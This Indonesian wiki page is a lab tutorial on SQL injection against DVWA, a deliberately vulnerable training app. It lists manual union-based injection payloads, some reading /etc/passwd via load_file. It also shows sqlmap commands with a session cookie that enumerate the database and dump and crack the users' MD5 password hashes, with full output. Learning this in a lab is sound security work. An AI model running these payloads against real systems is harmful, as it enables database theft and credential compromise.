SQLMap: Contoh SQL Injection ke DVWA

From OnnoWiki
Revision as of 05:56, 4 March 2017 by Onnowpurbo (talk | contribs) (→‎Proses manual untuk test Vulnerability)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Sumber: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/

Latar Belakang

Sebelum menggunakan SQLMAP akan sangat baik jika kita dapat melihat apakah injection dapat dilakukan. SQLMAP hanya alat bantu saja, sebaiknya kita mengetahui proses-nya secara manual. Semua SQLMAP fitur dapat dilakukan secara manual.


Proses manual untuk test Vulnerability

Dalam DVWA

Original Query

SELECT first_name, last_name FROM users WHERE user_ID = '$id'

Exploited Query

SELECT first_name, last_name FROM users WHERE user_ID =  union select user, password from dvwa.users -- '



Cek apakah situs kita vulnerable

1′ or ’2′=’2

Kita perlu melihat berapa banyak kolom sebelum ada error.

‘ and 1=1 union select 1,2 #
‘ and 1=1 union select 1,2,3 #

Ini akan memperlihatkan bahwa tabel-nya hanya ada 2 kolom.

Mari kita melakukan injection.

‘ union SELECT 1, user() — ‘
‘ and 1=1 union select database(),version() #
‘ union SELECT 1, user() #
‘ and 1=1 union select null,table_schema from information_schema.tables #
‘ and 1=1 union select table_name,table_schema from information_schema.tables #
‘ and 1=1 union select table_name,table_schema from information_schema.tables where table_schema=’dvwa’ #
‘ and 1=1 union select first_name,password from dvwa.users #
‘ union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ #
‘ union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘user_id’ #
‘ union select user, password FROM users #
‘ union SELECT 1, load_file(‘/etc/hosts’) #
‘ union SELECT 1, load_file(‘/etc/passwd’) #

Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom.

Menggunakan SQLMAP

Parameter yang kita gunakan & artinya

-u      URL yang dituju
--cookie mengirimkan / mengemulasi sebuah cookie header

Untuk memperoleh cookie, kita perlu mendapatkannya misalnya dengan firefox addon tamper data. Contoh

Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7
--dbs Ini akan memberikan daftar database jika sukses dilakukan.
-D   Ini untuk menentukan database yang diserang. 
--tables untuk melihat daftar tabel dari database -D parm. 
--columns untuk melihat kolom di -tables parm
--current-user untuk melihat current user yang menjalankan SQL
--users untuk melihat semua users dari SQL
--passwords untuk memberikan password yang di hash dari SQL instance.

Contoh Eksekusi

Cek daftar database yang ada

sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
--cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" --dbs

hasilnya

[07:02:08] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] mediawiki
[*] moodle
[*] mysql
[*] performance_schema
[*] snort

Cek daftar tabel dari database dvwa

sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
--cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa --tables


Hasilnya

[07:08:39] [INFO] fetching tables for database: 'dvwa'
[07:08:39] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+


Cek format kolom tabel users

sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
--cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --columns

Hasilnya

[07:11:51] [INFO] fetching columns for table 'users' in database 'dvwa'
[07:11:51] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+

dump password

sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#'
--cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --dump


--dump akan meng-crack password yang di hash. Anda akan ditanya apakah akan menggunakan dictionary yang ada di SQLMAP atau dictionary kita sendiri.

Hasilnya

[07:15:16] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[07:15:21] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[07:15:30] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[07:15:30] [INFO] starting 2 processes 
[07:15:35] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'                                                             
[07:15:42] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'                                                            
[07:15:50] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'                                                            
[07:15:54] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'                                                           
[07:16:00] [INFO] postprocessing table dump                                                                                                         
Database: dvwa
Table: users
[5 entries]
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                          | password                                    | last_name | first_name |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
| 2       | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+

Maka kita memperoleh password dari semua sql user :)

Referensi